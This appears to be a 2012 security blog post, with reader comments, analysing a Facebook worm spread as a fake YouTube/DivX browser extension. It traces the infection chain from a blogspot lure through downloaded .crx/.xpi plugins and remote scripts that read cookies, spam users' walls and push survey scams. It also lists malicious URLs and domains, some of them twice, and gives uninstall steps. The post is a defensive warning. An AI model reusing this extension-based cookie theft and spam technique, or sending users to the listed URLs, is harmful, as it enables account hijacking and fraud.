Facebook Worm gets installed as Firefox/Chrome
browser plugin to spread the infection and read user cookies. Below is the Spam message I received from one of the infected Facebook user.
Once you click on the above URL it takes you to a "random name.blogspot.com" where it says "Divx-Plugin Missing" and asks you to “Install Youtube
Premium plugin” and press F5. Actually it doesn’t play any video, just reloads the page and activates the newly installed plugin.
Based on the browser used by you it downloads the Plugin. It targets Chrome and Firefox users. It has 2 different links in the <iframe src="http://betterfinace.com/de.php" - "betterfinace.com/youtube.crx" and "betterfinace.com/youtube.xpi"
It prompts user to install the malicious plugin with Youtube as plugin name. Once plugin’s are installed it can take complete control of your browser.
If you are Chrome user you will be prompted with the below pop-up,
On exploring "youtube.xpi" I found a specific script "youtube.js". It contains link to another java script hosted in the remote site "betterfinace.com/script.js".
From "script.js" it contacts another script "extra.js". This does the extra work it contains several functions from reading user cookies to sending SPAM content.
Below you can see the set of strings which are randomly grouped to form the spam description.
Below is the Spam message posted by this worm on one of the infected user wall. The Spam description, image and blogspot domains are randomly chosen.
When you click on this post it will ask you to share the post in order to play the video. Actually it does to spread the infection.
This worm is different from previous ones. It keeps browser control until you remove the installed plugin and reads your cookies.
Please follow the below instructions if you're infected with this worm.
If you're Firefox user go to Tools->Add-ons->Extension->Uninstall
If you’re Chrome user go to Tools->Extensions->Remove
Other similar malicious blogspot domains spreading this infection are as follows,
794eercdv.blogspot.com
air-rated.blogspot.com
boobslivetelevision.blogspot.com
broeosiieee.blogspot.com
cooltosee.info
craftywss.blogspot.com
ddmspoidjds.blogspot.com
droppedontv.blogspot.com
eqwtgggg.blogspot.com
fbhotcelebs.blogspot.com
fghcvndfhf.blogspot.com
foopeere.blogspot.com
fqvideos.blogspot.com
heuheueuiwwi.blogspot.com
i9bgr68.blogspot.com
jekjrehre.blogspot.com
jqiwuhhefdsfk.blogspot.com
kodiwodi.blogspot.com
kwerjwe.blogspot.com
leekjrwhe.blogspot.com
leihhrere.blogspot.com
lelikfieire.blogspot.com
lomevomena.blogspot.com
oplllkitre.blogspot.com
play-all-now.blogspot.com
plugin7th.blogspot.com
plugin8th.blogspot.com
premium-plugin.blogspot.com
presuueiee.blogspot.com
pshueheue.blogspot.com
qwertyasdf2.blogspot.com
ryu5gdtd.blogspot.com
sayshuew.blogspot.com
shockervids.weebly.com
sweiigehre.blogspot.com
toptone10.blogspot.com
toptone9.blogspot.com
ukhreza.blogspot.com
vppoyre.blogspot.com
watchthatblogdze.blogspot.com
woot-on-tv1.blogspot.com
worldofhasppy.blogspot.com
wowomglolya.blogspot.com
yikes-was-it-on-tv12.blogspot.com
yikes-was-it-on-tv20.blogspot.com
ytrutujghjg.blogspot.com
Updated: Jan 18, 2012
Found a similar variant with the post "80 per cento delle persone non può guardare questo video per più di 20 secondi"
air-rated.blogspot.com
boobslivetelevision.blogspot.com
broeosiieee.blogspot.com
cooltosee.info
craftywss.blogspot.com
ddmspoidjds.blogspot.com
droppedontv.blogspot.com
eqwtgggg.blogspot.com
fbhotcelebs.blogspot.com
fghcvndfhf.blogspot.com
foopeere.blogspot.com
fqvideos.blogspot.com
heuheueuiwwi.blogspot.com
i9bgr68.blogspot.com
jekjrehre.blogspot.com
jqiwuhhefdsfk.blogspot.com
kodiwodi.blogspot.com
kwerjwe.blogspot.com
leekjrwhe.blogspot.com
leihhrere.blogspot.com
lelikfieire.blogspot.com
lomevomena.blogspot.com
oplllkitre.blogspot.com
play-all-now.blogspot.com
plugin7th.blogspot.com
plugin8th.blogspot.com
premium-plugin.blogspot.com
presuueiee.blogspot.com
pshueheue.blogspot.com
qwertyasdf2.blogspot.com
ryu5gdtd.blogspot.com
sayshuew.blogspot.com
shockervids.weebly.com
sweiigehre.blogspot.com
toptone10.blogspot.com
toptone9.blogspot.com
ukhreza.blogspot.com
vppoyre.blogspot.com
watchthatblogdze.blogspot.com
woot-on-tv1.blogspot.com
worldofhasppy.blogspot.com
wowomglolya.blogspot.com
yikes-was-it-on-tv12.blogspot.com
yikes-was-it-on-tv20.blogspot.com
ytrutujghjg.blogspot.com
Updated: Jan 18, 2012
Found a similar variant with the post "80 per cento delle persone non può guardare questo video per più di 20 secondi"
A link to a Fake Facebook apps page. If you use HTTPS then you're protected if not it will redirect you to http://checkthisoutvideo.blogspot.com/?new by contacting http://173.192.215.2/~game/link/. The blogspot domain is specially designed to trap users. Below you can see it is designed similar to that of a Facebook page, to make you believe it is from trusted source. The embedded content seen in the middle of the below page is from http://updateplugin.info/v/show.html
Installs fake browser plugin in the name of "Youtube Extension" from these links "http://updateplugin.info/v/divxc.crx" and "http://updateplugin.info/v/divx.xpi"
The plugin monitors browser and whenever you access the site facebook.com it runs the script updateplugin.info/v/script.js this script in turn calls firstreaction.altervista.org/extrapost.js and from there it end up contacting firstreaction.altervista.org/function.js which contains code to spam your wall with the scam post and then redirect you to survey by contacting video-divxoms.blogspot.com.
Opens up a page with title "Please Follow Steps to restore your account" and asks you to complete few surveys saying like for security reasons but it is fake. The ultimate goal of spammers here is to make you complete surveys so that they earn commission for every survey that is competed.
Don't fall prey for these kind of scam messages. If you have installed the malicious plugin follow the steps I have said above to uninstall the plugin.
Below seen are recent similar variants,
"Ecco il video trapelato nastro di Belen Rodriguez con l'Argentina 17 anni con il ragazzo! si perde tutto il vostro rispetto per Belen Rodriguez dopo aver visto questo"
Redirects to mybestworldings.blogspot.com
Policeman Takes Advantage of a Drunk Girl [video] - OMG!! I can't believe this.
Link in the scam redirects you to http://drunkgirladvantageout.blogspot.com/
Thanks sir for making me to aware about this scam..
ReplyDeleteYou are always welcome...
ReplyDeleteSiva super da thanks alot.....nice info...spread it sathya shankaran
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteGreat work Siva. Keep it up..
ReplyDelete@sathya shankaran Thanks:=)
ReplyDelete@Shiv - Thanks a Lot Siva:-)
ReplyDeleteDear Sir,
ReplyDeleteHow to get rid off this problem... I m facing the same.
HI Mishra,
ReplyDeleteIf you use Firefox browser then go to Tools->Add-ons->Extension->Uninstall (That Plugin)
If you use Chrome browser go to Tools->Extensions->Remove (That Plugin)